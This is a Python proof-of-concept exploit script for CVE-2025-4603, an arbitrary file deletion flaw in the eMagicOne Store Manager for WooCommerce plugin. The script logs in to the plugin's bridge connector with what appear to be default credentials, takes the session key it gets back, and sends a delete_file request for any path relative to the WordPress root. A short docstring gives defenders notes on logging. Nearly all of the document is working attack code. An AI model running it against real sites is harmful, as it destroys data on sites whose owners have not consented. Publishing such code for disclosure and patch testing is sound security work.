# Exploit Title: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Deletion
# Date: 05/07/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://emagicone.com
# Version: <= 1.2.5
# Tested on: 1.2.5
# CVE : CVE-2025-4603
import time
import urllib3
import hashlib
import argparse
import requests
def main():
    """Run the CVE-2025-4603 proof-of-concept against one site.

    The flow is two POSTs to the plugin's ``?connector=bridge`` endpoint:
    the first trades an MD5 of username+password for a ``session_key``
    (``task=get_version``), the second sends ``task=delete_file`` with that
    key and a caller-supplied path.

    Notes for defenders reading this listing:

    * The header lists versions <= 1.2.5 as affected.
    * The title says "unauthenticated", yet a credential hash is sent; the
      defaults here are "1"/"1" -- presumably the plugin's shipped
      credentials, confirm against the vendor advisory.
    * The delete request carries ``task``, ``key`` and ``path`` in the query
      string, so it should be visible in ordinary web-server access logs;
      the credential hash travels in the POST body and will not be.
    """
    # Certificate verification is switched off on every request below, so the
    # matching urllib3 warning is silenced up front.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Command-line interface.
    cli = argparse.ArgumentParser(description="CVE-2025-4603: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Deletion")
    cli.add_argument("victim_url", help="Target url or ip address.")
    cli.add_argument("--username", default="1", help="Username for authentication (default: 1)")
    cli.add_argument("--password", default="1", help="Password for authentication (default: 1)")
    cli.add_argument("--file", required=True, help="Path to file to delete relative to WordPress root")
    opts = cli.parse_args()

    # Fixed browser-like User-Agent shared by both requests.
    ua_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    http = requests.Session()
    bridge_url = f"{opts.victim_url}/?connector=bridge"

    # The connector is sent md5(username + password) as its "hash" field.
    credential_digest = hashlib.md5((opts.username + opts.password).encode()).hexdigest()

    print("[*] Requesting session key...")
    version_resp = http.post(
        bridge_url,
        data={"hash": credential_digest, "task": "get_version"},
        headers=ua_headers,
        verify=False,
    )
    print("[*] Raw response:", version_resp.text)

    # A non-JSON body (or JSON that is not an object) lands in the except arm.
    try:
        session_key = version_resp.json().get("session_key")
    except Exception:
        print("[-] Failed to parse session key from response:", version_resp.text)
        exit(1)

    if not session_key:
        print("[-] No session key returned!")
        exit(1)

    print("[+] Got session key:", session_key)
    time.sleep(2)

    # Every parameter of the second request goes into the URL, not the body.
    delete_url = f"{bridge_url}&task=delete_file&key={session_key}&path={opts.file}"

    print("[*] Attempting to delete file...")
    delete_resp = http.post(delete_url, headers=ua_headers, verify=False)
    print("[*] Delete response:", delete_resp.text)
# Script entry point: run main() only on direct execution, never on import.
if __name__ == "__main__":
    main()